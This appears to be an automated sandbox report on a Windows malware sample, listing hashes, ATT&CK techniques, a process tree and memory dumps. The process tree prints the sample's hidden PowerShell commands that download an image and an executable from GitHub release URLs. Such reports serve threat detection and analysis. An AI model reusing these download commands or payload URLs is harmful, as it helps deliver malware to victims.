123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072

General

Target

123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072.exe
Size

97KB
MD5

190d6b741716c51f9ab8b3601b5fb284
SHA1

77a6597f81c84555eec881f69a7f54e48503ba9c
SHA256

123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072
SHA512

e15a52f9f4597671a63e46f2b23130210d401c5a6b45bc9d024770e2348367109c128b60f24bb8bac259acf89258afed11ac3e26ed8453acb00fa57644c3e270
SSDEEP

1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfOxTDzfhPGT+/CBOg:Hq6+ouCpk2mpcWJ0r+QNTBfO9flu6CF

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2288	powershell.exe
1108	powershell.exe
1108	powershell.exe
2288	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2288	powershell.exe
1108	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	1108	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 2256 wrote to memory of 2300	2256	123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072.exe	31
PID 2256 wrote to memory of 2300	2256	123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072.exe	31
PID 2256 wrote to memory of 2300	2256	123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072.exe	31
PID 2256 wrote to memory of 2300	2256	123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072.exe	31
PID 2300 wrote to memory of 2288	2300	cmd.exe	33
PID 2300 wrote to memory of 2288	2300	cmd.exe	33
PID 2300 wrote to memory of 2288	2300	cmd.exe	33
PID 2300 wrote to memory of 1108	2300	cmd.exe	34
PID 2300 wrote to memory of 1108	2300	cmd.exe	34
PID 2300 wrote to memory of 1108	2300	cmd.exe	34
PID 2300 wrote to memory of 2716	2300	cmd.exe	35
PID 2300 wrote to memory of 2716	2300	cmd.exe	35
PID 2300 wrote to memory of 2716	2300	cmd.exe	35

C:\Users\Admin\AppData\Local\Temp\123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072.exe
"C:\Users\Admin\AppData\Local\Temp\123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2256
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D6CF.tmp\D6D0.tmp\D6D1.bat C:\Users\Admin\AppData\Local\Temp\123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/agreement/releases/download/ag/agreement0003.jpg/' -outfile agreement0003.jpg"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/secured00walti/releases/download/tg-igwe/task1hm.exe/' -outfile task1hm.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1108
- - C:\Windows\system32\calc.exe
    calc.exe
    3⤵
    PID:2716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\D6CF.tmp\D6D0.tmp\D6D1.bat

Filesize
2KB

MD5
29e689c445bd3cef5af9e1fff429d38b

SHA1
3042260fccd1160df610889eff836668c7c4fbb3

SHA256
cdf5084da6344bb254cf8bd7a22991f7dae43eafff8b1a23315add3fb65c5278

SHA512
a56c70d0926ddbd84f2942237acf361f5a77254d36a7dc3e38dc60fa6807f4cf987a505bcc1c21d5bea1be0c03d9023008025ec4ce6ea466dd7fd20c950f9e09

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f89b82addde4b406aa06c0c68f0bacde

SHA1
5a257ff225e61423a7c9bc7a9193748fe13c5c13

SHA256
f157468b1d358bb0df3f12bb8162bfc23f103bc1ed3ce39d13199aef3cdfa607

SHA512
7c5e537b28848ec65f9885a4e7c2f10e5b9a178289c22fa57568dcc52f9daf90d1dc918090bb37e7ab2bec91560344a719a46b50cac4b5aa91e5a19404d69c02

Download Submit
memory/1108-19-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/1108-20-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/2288-6-0x000007FEF56EE000-0x000007FEF56EF000-memory.dmp

Filesize
4KB

Download
memory/2288-7-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/2288-8-0x0000000001E90000-0x0000000001E98000-memory.dmp

Filesize
32KB

Download
memory/2288-9-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

Filesize
9.6MB

Download
memory/2288-12-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

Filesize
9.6MB

Download
memory/2288-13-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

Filesize
9.6MB

Download
memory/2288-11-0x000000000283B000-0x00000000028A2000-memory.dmp

Filesize
412KB

Download
memory/2288-10-0x0000000002834000-0x0000000002837000-memory.dmp

Filesize
12KB

Download

Analysis

Sharing